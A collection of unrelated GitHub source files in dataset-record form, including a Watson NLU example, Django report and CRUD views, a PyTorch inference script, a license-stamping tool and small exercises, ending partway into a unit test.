IAMAuthenticator('MY_KEY')\nnatural_language_understanding = NaturalLanguageUnderstandingV1(\n version='2020-08-01', # API 문서 참조\n authenticator=authenticator\n)\n\n\n# 서비스 시작이 얻는 URL 입력\nnatural_language_understanding.set_service_url('https://api.kr-seo.natural-language-understanding.watson.cloud.ibm.com/instances/e9d7070c-b625-475a-b47c-7df4003b71f6')\n\n\n# IBM Cloud API 문서 참고\n\n# 카테고리 예제\n# response = natural_language_understanding.analyze(\n# url='www.ibm.com',\n# features=Features(categories=CategoriesOptions(limit=3))\n# ).get_result()\n\n# print(json.dumps(response, indent=2))\n\n# 개념 분석 예제\n# response = natural_language_understanding.analyze(\n# url='www.ibm.com',\n# features=Features(concepts=ConceptsOptions(limit=3))).get_result()\n\n# print(json.dumps(response, indent=2))\n\n\n# 감정 분석 예제\n# 콘텐츠의 감정을 분석\n# response = natural_language_understanding.analyze(\n# html=\"Fruits

Apples and Oranges

I love apples! I don't like oranges.

\",\n# features=Features(emotion=EmotionOptions(targets=['apples','oranges']))).get_result()\n\n# print(json.dumps(response, indent=2))\n\n# Entity 분석 예제\n# 콘텐츠에서 사람, 도시, 조직과 같은 분류를 분석\n# response = natural_language_understanding.analyze(\n# url='www.cnn.com',\n# features=Features(entities=EntitiesOptions(sentiment=True,limit=1))).get_result()\n\n# print(json.dumps(response, indent=2))\n\n\n# 키워드 분석 예제\n# 콘텐츠에서 중요한 키워드를 분석\nresponse = natural_language_understanding.analyze(\n url='www.ibm.com',\n features=Features(keywords=KeywordsOptions(sentiment=True,emotion=True,limit=2))).get_result()\n\nprint(json.dumps(response, indent=2))\n","repo_name":"bae0053/IBM_Test","sub_path":"Natural_Language_Understanding/Authentication.py","file_name":"Authentication.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9231774870","text":"import pyautogui as p\nimport time as t\n# n = tgl awal\nn=1\np.hotkey('alt', 'tab')\n\nwhile n <= 21:\n p.hotkey('ctrl', 's')\n t.sleep(1)\n p.press('enter')\n t.sleep(1)\n p.hotkey('ctrl', 'pgdn')\n t.sleep(1)\n n = n+1\n","repo_name":"irpannawawi/wdio-dds","sub_path":"auto_save_dds.py","file_name":"auto_save_dds.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23399808621","text":"def check(N,r,t):\n return (2*r+1+2*(N-1))*N<=t\n\ndef solve(r,t):\n ## use iteration algorithm\n n = 0\n while check(2**n,r,t):\n n += 1\n n -= 1\n if n==-1:\n return 0\n N = 0\n for i in range(n+1):\n if check(N+2**(n-i),r,t):\n N += 2**(n-i)\n return N\n \n \n## \n## MAIN PROGRAM\n##\nT = int(input())\nfor n in range(T):\n ## read case\n r,t = map(int, input().rstrip().split())\n \n ## solve and print result\n result = solve(r,t)\n print('Case #'+str(n+1)+': '+str(result))\n\n\n \n \n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_120/196.py","file_name":"196.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"387100722","text":"# 계란으로 계란치기\nimport sys\ninput = sys.stdin.readline\n\nn = int(input())\neggs = [0]*n\ndamages = [0]*n\n\nfor i in range(n):\n eggs[i], damages[i] = map(int, input().split())\n\nans = 0 \n\ndef bomb(idx, eggs):\n global ans\n if idx == n:\n cnt = 0\n for i in range(n):\n if eggs[i] <= 0:\n cnt +=1\n if cnt > ans:\n ans = cnt\n return\n\n if eggs[idx] > 0:\n for i in range(n):\n check = False\n if eggs[i] > 0 and i != idx:\n check = True\n tmp = eggs[:]\n tmp[i] -= damages[idx]\n tmp[idx] -= damages[i]\n bomb(idx+1, tmp)\n if not check:\n bomb(idx+1, eggs)\n else:\n bomb(idx+1, eggs)\n\nbomb(0, eggs)\nprint(ans)","repo_name":"SIGMAOON/Brute_Force","sub_path":"16987.py","file_name":"16987.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19812572508","text":"from tkinter import font\nfrom reportlab.pdfgen import canvas\nfrom reportlab.lib.pagesizes import letter\nimport DataBase.DataBase as db\nfrom Funcoes.genericas import caminho_db\n\nfrom Relatorios.pdf_branco import Pdf\n \n \nclass RelatorioGeral(Pdf):\n\n def __init__(self, nome_arquivo, datas):\n super().__init__(nome_arquivo)\n\n self.y = 740\n self.datas = datas\n self.db = db.DataBase(caminho_db())\n self.consultar_dados()\n self.gerar()\n\n def consultar_dados(self):\n self.dados = {\n 'titulo':'GERAL',\n 'data_ini':self.datas[0],\n 'data_fim':self.datas[1],\n 'pagamentos':{\n },\n 'tanque':{\n 1:{'titulo':'GASOLINA INICIAL', 'valor': 0},\n 2:{'titulo':'GASOLINA ATUAL', 'valor': 0},\n },\n 'entradas_tanque':{\n },\n 'entradas_tanque_total':0,\n 'vendas':{\n 1:{'titulo':'LITROS VENDIDOS', 'valor': 0},\n 2:{'titulo':'DINHEIRO', 'valor': 0},\n 3:{'titulo':'CARTÃO', 'valor': 0},\n 4:{'titulo':'PIX', 'valor': 0},\n 5:{'titulo':'TOTAL', 'valor': 0}\n },\n 'entrada_total':0,\n 'entradas':{\n },\n 'saldo':0,\n }\n\n self.dados_tanque()\n self.dados_vendas()\n self.dados_pagamentos()\n self.dados_entradas()\n self.dados_tanque_entrada()\n\n\n \n def dados_tanque(self):\n dados = self.db.select_generico(\"SELECT quantidade FROM Valor_combustivel WHERE codigo=1\")\n vendas = self.db.select_generico(f\"SELECT litros FROM Caixa WHERE data BETWEEN '{self.datas[0]}' AND '{self.datas[1]}'\")\n entrada = self.db.select_generico(f\"SELECT data, combustivel, quantidade, valor_nota FROM entrada_combustivel WHERE data BETWEEN '{self.datas[0]}' AND '{self.datas[1]}'\")\n tanque = self.dados['tanque']\n total = 0\n for i in vendas:\n total+= i[0]\n for i in entrada:\n total-= i[2]\n\n\n tanque[1]['valor'] = self.litro(total + dados[0][0])\n tanque[2]['valor'] = self.litro(dados[0][0])\n\n\n def dados_tanque_entrada(self):\n entrada = self.db.select_generico(f\"SELECT data_compra, data, id, quantidade, valor_nota FROM entrada_combustivel WHERE data BETWEEN '{self.datas[0]}' AND '{self.datas[1]}'\")\n entrada_tanque = self.dados['entradas_tanque']\n total = 0\n\n for j, i in enumerate(entrada):\n entrada_tanque[j] = {}\n entrada_tanque[j]['data_compra'] = i[0]\n entrada_tanque[j]['data'] = i[1]\n entrada_tanque[j]['nota'] = i[2]\n entrada_tanque[j]['quantidade'] = self.litro(i[3])\n entrada_tanque[j]['valor_nota'] = self.dinheiro(i[4])\n total += i[3]\n\n self.dados['entradas_tanque_total'] = self.litro(total)\n\n def dados_entradas(self):\n dados = self.db.select_generico(f\"SELECT data, nome, descricao, valor FROM Entrada WHERE data BETWEEN '{self.datas[0]}' AND '{self.datas[1]}'\")\n entrada = self.dados['entradas']\n total = 0\n for i, j in enumerate(dados):\n entrada[i] = {}\n entrada[i]['data'] = j[0]\n entrada[i]['nome'] = j[1]\n entrada[i]['descrição'] = j[2]\n entrada[i]['valor'] = self.dinheiro(j[3])\n total+= j[3]\n \n self.dados['saldo'] = self.dados['saldo'] + total\n self.dados['entrada_total'] = self.dinheiro(total)\n\n def dados_pagamentos(self):\n tipos = self.db.select_generico(\"SELECT DISTINCT tipo FROM Despesas WHERE status ='Pago' AND data BETWEEN '{}' AND '{}'\".format(self.datas[0],self.datas[1]))\n dados = self.db.select_generico(\"SELECT tipo, valor FROM Despesas WHERE status ='Pago' AND data BETWEEN '{}' AND '{}'\".format(self.datas[0],self.datas[1]))\n pagamentos = self.dados['pagamentos']\n for j in tipos:\n pagamentos[j[0]] = {'titulo': j[0], 'valor': 0}\n for i in dados:\n pagamentos[i[0]]['valor'] += i[1]\n\n total = {'titulo': 'TOTAL', 'valor': 0}\n for i in pagamentos.values():\n total['valor'] += i['valor']\n\n pagamentos['TOTAL'] = total\n saldo = self.dados['saldo']\n self.dados['saldo'] = saldo - total['valor']\n \n for i in pagamentos.values():\n i['valor'] = self.dinheiro(i['valor'])\n\n def dados_vendas(self):\n dados = self.db.select_generico(\"SELECT litros, dinheiro_caixa, cartao, pix, total FROM Caixa WHERE data BETWEEN '{}' AND '{}'\".format(self.datas[0],self.datas[1]))\n vendas = self.dados['vendas']\n for i in dados:\n vendas[1]['valor'] += i[0]\n vendas[2]['valor'] += i[1]\n vendas[3]['valor'] += i[2]\n vendas[4]['valor'] += i[3]\n vendas[5]['valor'] += i[4]\n\n self.dados['saldo'] = self.dados['saldo'] + vendas[5]['valor']\n vendas[1]['valor'] = self.litro(vendas[1]['valor'])\n vendas[2]['valor'] = self.dinheiro(vendas[2]['valor'])\n vendas[3]['valor'] = self.dinheiro(vendas[3]['valor'])\n vendas[4]['valor'] = self.dinheiro(vendas[4]['valor'])\n vendas[5]['valor'] = self.dinheiro(vendas[5]['valor'])\n\n def gerar(self):\n self.can = canvas.Canvas(self.packet)\n self.preencher_cabecalho()\n self.vendas()\n self.tanque()\n self.tanque_entrada()\n self.entradas()\n self.pagamentos()\n self.saldo()\n\n self.can.save()\n self.gerar_relatorio_mensal()\n\n \n def preencher_cabecalho(self):\n self.font(26)\n self.can.drawRightString(320, 790, f\"RELATÓRIO {self.dados['titulo']}\")\n self.font(10)\n self.can.drawRightString(570, 790, f\"Periodo: {self.dados['data_ini']} à {self.dados['data_fim']}\")\n\n def vendas(self):\n self.titulo('VENDAS', font=12, y=0)\n for i in self.dados['vendas'].values():\n self.campo(i['titulo'], i['valor'], font=10)\n self.mudarY(-30)\n\n def tanque(self):\n self.titulo('TANQUE', font=12, y=0)\n for i in self.dados['tanque'].values():\n self.campo(i['titulo'], i['valor'], font=10)\n self.mudarY(-20)\n\n def tanque_entrada(self):\n self.titulo('ENTRADAS COMBUSTIVEL',x=70, font=11)\n if self.dados['entradas_tanque'] != {}:\n self.linhas_tabela_tanque(['COMPRA', 'RECEBIMENTO', 'Nº NOTA', 'QUANTIDADE', 'VALOR',], font=10)\n for i in self.dados['entradas_tanque'].values():\n self.linhas_tabela_tanque([i['data_compra'],i['data'], i['nota'], i['quantidade'], i['valor_nota']],y=-15, font=10)\n self.total_tabela_tanque(self.dados['entradas_tanque_total'], font=10)\n self.mudarY(-30)\n\n def entradas(self):\n self.titulo('ENTRADA CAPITAL', font=12, y=0)\n if self.dados['entradas'] != {}:\n self.linhas_tabela(['DATA', 'RESPONSAVEL', 'DESCRIÇÃO', 'VALOR'], font=10)\n for i in self.dados['entradas'].values():\n self.linhas_tabela([i['data'], i['nome'], i['descrição'], i['valor']], font=10)\n self.total_tabela(self.dados['entrada_total'], font=10)\n self.mudarY(-30)\n\n def pagamentos(self):\n self.titulo('PAGAMENTOS', font=12, y=0)\n for i in self.dados['pagamentos'].values():\n self.campo(i['titulo'], i['valor'], font=10)\n self.mudarY(-30)\n\n def saldo(self):\n self.campo_saldo(self.dinheiro(self.dados['saldo']), font=10)\n\n","repo_name":"GsFerreira99/Sistema-Posto","sub_path":"Relatorios/cabecalho.py","file_name":"cabecalho.py","file_ext":"py","file_size_in_byte":7710,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40233252968","text":"# coding=utf-8\n\n\nfrom pants.backend.jvm.targets.exclude import Exclude\nfrom pants.backend.jvm.targets.jar_dependency import JarDependency\nfrom pants.option.custom_types import list_option\nfrom pants.subsystem.subsystem import Subsystem\nfrom pants.task.task import Task\n\n\nclass SJar(Subsystem):\n options_scope = 'sjar'\n _excludes = None\n\n @classmethod\n def register_options(cls, register):\n super(SJar, cls).register_options(register)\n register('--excludes', advanced=True, type=list_option, default=[], fingerprint=True,\n help='Specifies the org and name of the jars to exclude from all sjar() entries\\n'\n '[ { \"org\": \"\", \"name\": \"\"}, ... ]')\n\n @classmethod\n def get_excludes(cls):\n if cls._excludes == None:\n excludes = []\n for exclude in cls.global_instance().get_options().excludes:\n excludes.append(Exclude(org=exclude['org'], name=exclude['name']))\n cls._excludes = excludes\n return cls._excludes\n\n\nclass SJarTask(Task):\n \"\"\"A task used soley as a vehicle to register the SJar subsystem.\n\n See https://github.com/pantsbuild/pants/issues/2858\n \"\"\"\n @classmethod\n def global_subsystems(cls):\n return super(SJarTask, cls).global_subsystems() + (SJar,)\n\n def execute(self):\n pass\n\n\nclass JarDependencyWithGlobalExcludes(JarDependency):\n \"\"\"Automatically append all 'excludes' defined in pants.ini to a JarDependency target.\n\n This target is aliased to 'sjar' in register.py. Use it anywhere you would normally use\n a 'jar()' target to pull in an artifact compiled externally to the repo (e.g. in nexus).\n\n Include the org and name of the jar to exclude in section in pants.ini:\n\n [sjar]\n excludes: [\n { \"org\" : \"org.json\",\n \"name\" : \"json\"\n },\n ...\n ]\n\n The name 'sjar' is historical for a similar implementation defined privately inside of other\n users' repo. If you mention the term 'sjar' on the Pants mailing list, many existing users\n will know the concept.\n \"\"\"\n\n @classmethod\n def _calc_excludes(cls, org, name, excludes):\n # NB(zundel) Below, note that self.excludes is usually [] and the list of global excludes is a\n # fixed list currently ~25 items in pants.ini\n excludes = list(excludes or ())\n excludes.extend(e for e in SJar.get_excludes() if not (e.org == org and e.name == name))\n return excludes\n\n def __new__(cls, org, name, rev=None, force=False, ext=None, url=None, apidocs=None,\n classifier=None, mutable=None, intransitive=False, excludes=None):\n return JarDependency(\n org, name, rev=rev, force=force, ext=ext, url=url, apidocs=apidocs,\n classifier=classifier, mutable=mutable, intransitive=intransitive,\n excludes=cls._calc_excludes(org, name, excludes),\n )\n","repo_name":"ericzundel/mvn2pants","sub_path":"src/python/squarepants/plugins/sjar/exclude_globally.py","file_name":"exclude_globally.py","file_ext":"py","file_size_in_byte":2754,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"70508400196","text":"import torch.nn as nn\nimport torch\nimport numpy as np\nimport os\nimport cv2\nimport random\n\nimport utils\nimport const\nfrom modeling_and_tuning.models.unet_v2 import UNetV2, UNetV2Smaller\n\nos.environ[\"PYTORCH_CUDA_ALLOC_CONF\"] = \"max_split_size_mb:1024\"\n\n\ndef inference(\n model: nn.Module,\n img_size: (int, int) = None,\n input_path: str = const.VALIDATE_INPUT_PATH,\n target_path: str = const.VALIDATE_TARGET_PATH,\n random=True\n):\n with torch.no_grad():\n raw_input_img = np.load(input_path)\n target_img = np.load(target_path)\n\n if img_size:\n piece_H, piece_W = img_size\n\n # mul = 10\n # piece_H = piece_H*mul\n # piece_W = piece_W*mul\n if random:\n org_H, org_W, _ = raw_input_img.shape\n start_h = random.randint(0, org_H - piece_H)\n start_w = random.randint(0, org_W - piece_W)\n else:\n start_h = 0\n start_w = 0\n raw_input_img = raw_input_img[start_h:start_h + piece_H, start_w:start_w + piece_W, :]\n target_img = target_img[start_h:start_h + piece_H, start_w:start_w + piece_W, :]\n\n img_H, img_W, _ = raw_input_img.shape\n pieces = utils.split_into_smaller_pieces(raw_input_img)\n pH, pW, pCh = pieces[0].shape\n pieces_transformed = []\n for piece in pieces:\n piece = np.reshape(piece, (pCh, pH, pW))\n piece = torch.from_numpy(piece)\n pieces_transformed.append(piece)\n input_tensor = torch.stack(pieces_transformed, dim=0)\n\n batches = []\n for i in range(0, len(input_tensor), const.BATCH_SIZE):\n batches.append(input_tensor[i: min(i + const.BATCH_SIZE, len(input_tensor))])\n\n results = []\n for batch in batches:\n b_result = model(batch.cuda())\n b_result = b_result.cpu().numpy()\n rB, rCh, rH, rW = b_result.shape\n b_result = np.reshape(b_result, (rB, rH, rW, rCh))\n results.append(b_result)\n result = np.concatenate(results, axis=0)\n result = utils.reconstruct_into_whole_image(result, img_H, img_W)\n\n return raw_input_img, target_img, result\n\n\nif __name__ == \"__main__\":\n # model = UNetV2(const.INPUT_CHANNELS, const.OUTPUT_CHANNELS, bilinear=const.BILINEAR)\n model = UNetV2Smaller(const.INPUT_CHANNELS, const.OUTPUT_CHANNELS)\n\n model.load_state_dict(torch.load(\"../models_storage/tuned-smaller/tuned-60epochs.pt\"))\n model.to(utils.get_device())\n\n raw_input_img, target_img, result = inference(model, img_size=const.PIECE_SHAPE)\n # raw_input_img, target_img, result = inference(model)\n\n utils.display_image(raw_input_img)\n utils.display_image(target_img)\n utils.display_image(result)\n","repo_name":"kkulesz/AMLS_excercise","sub_path":"modeling_and_tuning/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":2815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1871553013","text":"import subprocess, os\n\n#Debug flag\ndebug = False\n\n__repo_dir__ = os.path.normpath(\n os.path.join(os.path.realpath(__file__), '..', '..'))\n\n\n# Markdown code blob we should use to insert into notebook files\ndef getipynb_markdownBlockAsList():\n markdownBlock = [\n '\\t{\\n'\n '\\t\\t\"cell_type\": \"code\",\\n', '\\t\\t\"execution_count\": null,\\n',\n '\\t\\t\"metadata\": {},\\n', '\\t\\t\"outputs\": [],\\n', '\\t\\t\"source\": [\\n',\n '\\t\\t\\t\\\"# The MIT License (MIT)\\\\n\\\",\\n', '\\t\\t\\t\\\"#\\\\n\\\",\\n',\n '\\t\\t\\t\\\"# Copyright (c) 2015-2023 Advanced Micro Devices, Inc. All rights reserved.\\\\n\\\",\\n',\n '\\t\\t\\t\\\"#\\\\n\\\",\\n',\n '\\t\\t\\t\\\"# Permission is hereby granted, free of charge, to any person obtaining a copy\\\\n\\\",\\n',\n '\\t\\t\\t\\\"# of this software and associated documentation files (the \\'Software\\'), to deal\\\\n\\\",\\n',\n '\\t\\t\\t\\\"# in the Software without restriction, including without limitation the rights\\\\n\\\",\\n',\n '\\t\\t\\t\\\"# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\\\\n\\\",\\n',\n '\\t\\t\\t\\\"# copies of the Software, and to permit persons to whom the Software is\\\\n\\\",\\n',\n '\\t\\t\\t\\\"# furnished to do so, subject to the following conditions:\\\\n\\\",\\n',\n '\\t\\t\\t\\\"#\\\\n\\\",\\n',\n '\\t\\t\\t\\\"# The above copyright notice and this permission notice shall be included in\\\\n\\\",\\n',\n '\\t\\t\\t\\\"# all copies or substantial portions of the Software.\\\\n\\\",\\n',\n '\\t\\t\\t\\\"#\\\\n\\\",\\n',\n '\\t\\t\\t\\\"# THE SOFTWARE IS PROVIDED \\'AS IS\\', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\\\\n\\\",\\n',\n '\\t\\t\\t\\\"# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\\\\n\\\",\\n',\n '\\t\\t\\t\\\"# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\\\\n\\\",\\n',\n '\\t\\t\\t\\\"# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\\\\n\\\",\\n',\n '\\t\\t\\t\\\"# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\\\\n\\\",\\n',\n '\\t\\t\\t\\\"# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\\\\n\\\",\\n',\n '\\t\\t\\t\\\"# THE SOFTWARE.\\\\n\\\"\\n', '\\t\\t]\\n', '\\t},'\n ]\n return markdownBlock\n\n\ndef hasKeySequence(inputfile, key_message):\n result = False\n if key_message in inputfile:\n result = True\n\n return result\n\n\n# Header and footer of the comment block\n# modify these if we want some different style\ndef topHeader(commentChar):\n delim = None\n\n #Early return\n if \"//\" in commentChar:\n delim = getipynb_markdownBlockAsList()\n delim.append(\"\\n\")\n return ''.join(str(x) for x in delim)\n\n if \"*\" in commentChar:\n delim = \"/*\\n\"\n if \"#\" in commentChar:\n delim = \"#####################################################################################\\n\"\n return delim\n\n\ndef bottomFooter(commentChar):\n delim = None\n #Early return - no footer handled by\n if \"//\" in commentChar:\n return delim\n\n if \"*\" in commentChar:\n delim = \"*/\\n\"\n if \"#\" in commentChar:\n delim = \"#####################################################################################\\n\"\n return delim\n\n\n#Simple just open and write stuff to each file with the license stamp\ndef openAndWriteFile(filename, message, commentChar):\n add_shebang = False\n #markdown file stamping for .ipynb\n save_markdown_lines = []\n modify_markdown = False\n\n #open save old contents and append things here\n if debug is True:\n print(\"Open\", filename, end='')\n\n #with open(filename, 'r') as contents:\n # save = contents.read()\n try:\n file = open(filename, 'r')\n except OSError as e:\n if debug is True:\n print(str(e) + \"....Open Error: Skipping file \")\n file.close()\n return\n else:\n with file as contents:\n try:\n if commentChar != \"//\":\n saved_shebang = contents.readline()\n add_shebang = hasKeySequence(saved_shebang, \"#!\")\n\n # No shebang so start at beginning line\n if add_shebang is False:\n contents.seek(0)\n\n # Get the first tags in notebook before we insert license into a cell as a comment block\n if commentChar == \"//\":\n save_markdown_lines.extend(contents.readline()) # { tag\n save_markdown_lines.extend(\n contents.readline()) # \"cells\": [ tag\n modify_markdown = True\n\n #read remaining lines in the original file\n save = contents.read()\n\n hasAmdLic = hasKeySequence(\n save, \"Advanced Micro Devices, Inc. All rights reserved\")\n hasOtherLic = hasKeySequence(save, \"Software License\")\n\n #Check if we have a licence stamp already\n if hasAmdLic or hasOtherLic is True:\n if debug is True:\n print(\"....Already Stamped: Skipping file \")\n\n contents.close()\n return\n\n except UnicodeDecodeError as eu:\n if debug is True:\n print(str(eu) + \"...Skipping binary file \")\n contents.close()\n return\n\n if debug is True:\n print(\"...Writing header\", end='')\n\n with open(filename, 'w') as contents:\n #append the licence to the top of the file\n\n #Append shebang before license\n if add_shebang is True:\n contents.write(saved_shebang + \"\\n\")\n\n #Append markdown hooks before license\n if modify_markdown is True:\n contents.write(''.join(str(x) for x in save_markdown_lines))\n\n delim = topHeader(commentChar)\n if delim is not None:\n contents.write(delim)\n #print(delim)\n\n if modify_markdown is False:\n for line in message:\n if line != '':\n contents.write(commentChar + \" \" + line + \"\\n\")\n else:\n contents.write(commentChar + \"\\n\")\n\n delim = bottomFooter(commentChar)\n if delim is not None:\n contents.write(delim)\n\n #write remaining contents\n contents.write(save)\n if debug is True:\n print(\"...done\")\n\n\n# Get the file type based on what we care about to tag with our licence\n# file. Otherwise return None for the delimiter and skip the file\n\n\ndef getDelimiter(filename):\n\n delimiterDict = {\n \".cpp\": \"*\",\n \".hpp\": \"*\",\n \".h\": \"*\",\n \".ipynb\": \"//\",\n \".py\": \"#\",\n \".txt\": \"#\",\n \".bsh\": \"#\",\n \".sh\": \"#\",\n \".cmake\": \"#\"\n }\n listOfKeys = delimiterDict.keys()\n delimiter = None\n\n for extension in listOfKeys:\n if extension in filename:\n delimiter = delimiterDict[extension]\n break\n\n return delimiter\n\n\ndef main():\n\n message = open(os.path.join(__repo_dir__, 'LICENSE')).read()\n\n #Get a list of all the files in our git repo\n #bashCommand = \"git ls-files --exclude-standard\"\n #print (bashCommand.split())\n proc = subprocess.run(\"git ls-files --exclude-standard\",\n shell=True,\n stdout=subprocess.PIPE,\n cwd=__repo_dir__)\n fileList = proc.stdout.decode().split('\\n')\n message = message.split('\\n')\n\n if debug is True:\n print(\"Target file list:\\n\" + str(fileList))\n print(\"Output Message:\\n\" + str(message))\n\n for rfile in fileList:\n file = os.path.join(__repo_dir__, rfile)\n #print(file)\n commentDelim = getDelimiter(file)\n if commentDelim is not None:\n openAndWriteFile(file, message, commentDelim)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ROCmSoftwarePlatform/AMDMIGraphX","sub_path":"tools/license_stamper.py","file_name":"license_stamper.py","file_ext":"py","file_size_in_byte":7886,"program_lang":"python","lang":"en","doc_type":"code","stars":135,"dataset":"github-code","pt":"61"} +{"seq_id":"34511071512","text":"data = [[500,600],[700,500],[400,800],[300,500],[600,500],[200,700],[600,800]]\nsum = []\nfor i in data:\n for j in i:\n sum1 += j\n sum.append(sum1)\n sum1 = 0\n\nmaxsum = max(sum)\nindex = sum.index(maxsum)\nprint(sum)\nsumlist2 = []\nfor i in data:\n sum2 += sum(1)\n sumlist2.append(sum2)\n sum2 = 0\nprint(sumlist2)\n# for i in sumlist2:\n# sum3 += \n\n\n\n\n# def openthefile():\n# file = open(\"C:\\\\Users\\\\Victus\\\\OneDrive\\\\Desktop\\\\filepy.txt\",\"w\")\n# str = \"Hello\\nWelcome to file handling in python\"\n# file.write(str)\n# print(\"file updated\")\n\n# def appenddatatofile():\n# file = open(\"C:\\\\Users\\\\Victus\\\\OneDrive\\\\Desktop\\\\filepy.txt\",\"a\")\n# str1 = \"\\nThis data is appended to the file\\n\"\n# str2 = \"PalinDrome Word Naman\"\n# file.write(str1)\n# print(\"file updated\")\n\n# list = []\n\n# def readdatafromfile():\n# file = open(\"C:\\\\Users\\\\Victus\\\\OneDrive\\\\Desktop\\\\filepy.txt\",\"r\")\n# # print(file.read())\n# i = 0\n# count = 0\n# for i in file:\n# for word in i.split():\n# count+=1\n# list.append(word)\n# # print(i)\n# print(count)\n# print(\"list=\",list)\n# file.close()\n \n# list1 = []\n# list2 = []\n# duplicate = []\n# unique = []\n# # openthefile()\n# # appenddatatofile()\n# readdatafromfile()\n\n# def findpalindrome():\n# for i in list:\n# j = i[::-1]\n# if i == j:\n# list1.append(i)\n# print(list1)\n\n# # findpalindrome() \n\n# def finduplicate():\n# for i in list:\n# if i not in unique:\n# unique.append(i)\n# elif i not in duplicate:\n# duplicate.append(i)\n# print(unique)\n\n# finduplicate()\n","repo_name":"SujalNayak/Website","sub_path":"OneDrive/Desktop/VS Code/Desktop/Python/File_Handling.py","file_name":"File_Handling.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18163338955","text":"\nclass Elevator:\n __max_speed = 0.1 # meters/second\n\n def __init__(self, controller, floors, name: str, index: int):\n self.controller = controller\n self.destination = None\n self.elevation = floors[0].elevation # meters\n self.velocity = 0.0 # meters/second\n self.name = name\n self.index = index\n self.buttons = {floor: False for floor in floors}\n\n def __str__(self):\n return f\"{self.name} h={self.elevation} v={self.velocity}\"\n\n def tick(self):\n if self.destination is not None:\n distance = self.destination.elevation - self.elevation\n if distance > 0.1:\n self.velocity = self.__max_speed\n elif distance < -0.1:\n self.velocity = -self.__max_speed\n else:\n self.velocity = 0.0\n self.controller.on_elevator_arrived(self)\n\n self.elevation += self.velocity\n","repo_name":"xajohnson/pyelevator","sub_path":"pyelevator/elevator.py","file_name":"elevator.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7151493022","text":"from django.shortcuts import render, get_object_or_404\nfrom django.http import JsonResponse\nfrom django.template.loader import render_to_string\n\nfrom .models import Employee\nfrom .forms import EmployeeForm\n\n\n\ndef employee_list(request):\n employees = Employee.objects.all()\n return render(request, 'employ/employee_list.html', {'employees': employees})\n\n\ndef save_employee_form(request, form, template_name):\n data = dict()\n if request.method == 'POST':\n if form.is_valid():\n form.save()\n data['form_is_valid'] = True\n employee = Employee.objects.all()\n data['html_employee_list'] = render_to_string('employ/includes/employee_list.html', {\n 'employee': employee\n })\n else:\n data['form_is_valid'] = False\n context = {'form': form}\n data['html_form'] = render_to_string(template_name, context, request=request)\n return JsonResponse(data)\n\n\ndef employee_create(request):\n if request.method == \"POST\":\n form = EmployeeForm(request.POST, request.FILES)\n else:\n form = EmployeeForm()\n return save_employee_form(request, form, 'employ/includes/employee_create.html')\n\n\ndef employee_update(request, pk):\n employee = get_object_or_404(Employee, pk=pk)\n if request.method == 'POST':\n form = EmployeeForm(request.POST, instance=employee)\n else:\n form = EmployeeForm(instance=employee)\n return save_employee_form(request, form, 'employ/includes/employee_update.html')\n\n\ndef employee_delete(request, pk):\n employee = get_object_or_404(Employee, pk=pk)\n data = dict()\n if request.method == 'POST':\n employee.delete()\n data['form_is_valid'] = True\n employees = Employee.objects.all()\n data['html_employee_list'] = render_to_string('employ/includes/employee_list.html', {\n 'employees': employees\n })\n else:\n context = {'employee': employee}\n data['html_form'] = render_to_string('employ/includes/employee_delete.html', context, request=request)\n return JsonResponse(data)\n","repo_name":"IBRAHIM-kd/Employee-Ems","sub_path":"EMS/employee/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"27461111448","text":"import glob\nimport sys\nfrom pathlib import Path\nfrom unittest.mock import patch\n\nfrom tbpore.constants import repo_root\nfrom tbpore.external_tools import ExternalTool\n\n\nclass TestExternalTools:\n @patch.object(\n ExternalTool,\n ExternalTool._build_command.__name__,\n return_value=[\"mocked\", \"command\", \"arg\"],\n )\n @patch.object(Path, Path.mkdir.__name__)\n def test___constructor(self, mkdir_mock, build_command_mock):\n logdir = Path(\"logs\")\n\n external_tool = ExternalTool(\"tool\", \"input\", \"output\", \"params\", logdir)\n\n assert external_tool.command == [\"mocked\", \"command\", \"arg\"]\n assert external_tool.command_as_str == \"mocked command arg\"\n assert (\n external_tool.out_log\n == \"logs/tool_c238863b32d18040bbf255fa3bf0dc91e9afa268335b56f51abe3c6d1fd83261.out\"\n )\n assert (\n external_tool.err_log\n == \"logs/tool_c238863b32d18040bbf255fa3bf0dc91e9afa268335b56f51abe3c6d1fd83261.err\"\n )\n\n build_command_mock.assert_called_once_with(\"tool\", \"input\", \"output\", \"params\")\n mkdir_mock.assert_called_once_with(parents=True, exist_ok=True)\n\n def 